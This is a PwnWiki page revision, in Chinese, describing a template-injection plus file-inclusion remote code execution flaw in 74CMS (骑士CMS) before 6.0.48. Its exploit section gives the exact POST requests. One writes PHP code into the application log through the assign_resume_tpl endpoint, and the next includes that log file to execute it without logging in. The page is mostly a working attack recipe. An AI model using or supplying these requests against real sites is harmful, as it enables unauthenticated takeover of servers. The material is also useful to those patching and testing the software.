Difference between revisions of "騎士CMS模版註入 &文件包含getshell漏洞/zh-cn"
From PwnWiki
(Created page with "骑士CMS模板注入 &文件包含getshell漏洞") |
(Created page with "==影响范围==") |
||
| (2 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
==漏洞描述== | ==漏洞描述== | ||
| − | + | 骑士CMS人才系统,是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。 | |
| − | |||
| − | |||
| − | + | 骑士CMS官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可以在无需登录的情况下执行任意代码,控制服务器。 | |
| − | |||
| − | |||
| − | + | ==影响范围== | |
| − | + | 骑士 CMS < 6.0.48 | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
==漏洞利用== | ==漏洞利用== | ||
| − | |||
| − | + | 使用火狐hackbar发送POST: | |
| − | |||
| − | |||
<pre> | <pre> | ||
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl | http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl | ||
| Line 32: | Line 20: | ||
| − | + | 可以看到日志记录。 | |
| − | |||
| − | |||
| − | + | 包含这条日志,注意路径和日志名称: | |
| − | |||
| − | |||
<pre> | <pre> | ||
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl | http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl | ||
Latest revision as of 17:16, 5 July 2021
漏洞描述
骑士CMS人才系统,是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。
骑士CMS官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可以在无需登录的情况下执行任意代码,控制服务器。
影响范围
骑士 CMS < 6.0.48
漏洞利用
使用火狐hackbar发送POST:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
可以看到日志记录。
包含这条日志,注意路径和日志名称:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log
